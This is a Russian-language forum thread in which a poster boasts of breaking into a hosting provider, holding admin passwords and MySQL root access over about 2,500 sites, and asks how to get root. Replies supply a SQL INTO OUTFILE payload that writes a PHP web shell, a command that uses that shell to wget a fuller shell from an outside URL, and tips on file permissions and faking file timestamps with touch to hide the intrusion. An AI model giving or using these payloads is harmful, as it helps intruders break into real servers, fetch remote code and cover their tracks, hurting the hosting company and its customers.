Root MySQL
 

Ребятишки, я вот взломал хостинг, там идиоты админы походу, есть у меня их пассы частично и рут к базе данных. Я могу получить рута на серваке?

насчет рута хз, но шелл можешь.
select 'web shell code' into outfile '/path_to_web_shell'

Пасиб, попробую! А это будет root shell?

#1064 - You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 :(

SELECT '<? system($_GET[cmd]); ?>' INTO OUTFILE 'ЗДЕСЬ локальная ДИРЕКТОРИЯ В КоТОРУЮ ТЫ ХОЧЕШЬ ПОМЕСТИТЬ ШЕЛЛ'

НЕзабудь про кавычки!Пример дириктории /www/site/users/htdocs/shell.php

Попробую. Там явно phpmyadmin (который любезные администраторы предоставили) глючный.
Я вот думаю, мне мучаться с root'ом, или нет? И так есть управление 2,5 тысячами сайтов :cool:
И пароли администраторов... Правда, не все пароли.

НУ это ты сам решай,а если так то удачи!

А еще!После того как ты выполнишь эту команду файл примет вид: shell.php,это командер!Чтобы залить полноценный шел надо сделать так!http://сайт/директория/shell.php?cmd=wget http://И адрес где лежит полноценный шелл!Можешь взять вот этот http://vrms.narod.ru/remview.php

Если права поставлены правильно (а это так), то ничего не выйдет

ЭТО ПЛОХО!0777 рулит!

Ха-ха :)

Это точно.

Ну, сейчас у горе-хостера сервак лежит, не могу попробовать. А когда попробую - отпишусь

666 тоже ничего =)

Заливай CGI шелл, у тебя будет шелл с правами root

имхо будут права mysql

имхо будут права апача

Имхо ничего не будет :) Не работает так через мускул. Все время жалуется на ошибку

select '<?php system($_GET[cmd]); ?>' into outfile 'path_to_your_shell'
не катит?
Если пишет "access denied to user ...@...", то облом

Пишет "You have an error in your mysql syntax on line 1 near ' ' ", что бы я не писал :) :confused:
А вообще, оказалось, что кто-то до меня там уже что-то пытался сделать, т.к. я нашел там на одном из сайтов два руткита и три шелла. Однако, там стоят довольно отдаленные даты и не похоже, что у этого хакера что-то вышло.
Я все никак не расшифрую пасс самого главного админа :(
У же есть пароли 4-х главных администраторов

люди скажите плз как при помощи MySQL-Front в бд шел сделать доступ и права на редактирование есть

А попонятнее?

А если еще раз и по-русски?

===>Пишет "You have an error in your mysql syntax on line 1 near ' ' ",
Он тебе пишет что кавычка ему не нравиться, а ты их ещё добавляешь )))
Пробуй char.

===>там стоят довольно отдаленные даты
Дата меняется так: touch -t 200501281254 имя файла. 28 января 2005 12:54. )))

===>У же есть пароли 4-х главных администраторов
Дык вводи-же их!!! Неужели некуда? )))

1. Понял, попробую. Спасибо.
2. Не фига =) Я знаю эту команду. Там нет прав на запись через шелл в этой папке, соответственно, не работает эта команда.
3. Дык у меня есть управление хостингом, но нету все-таки главного пароля и нету root...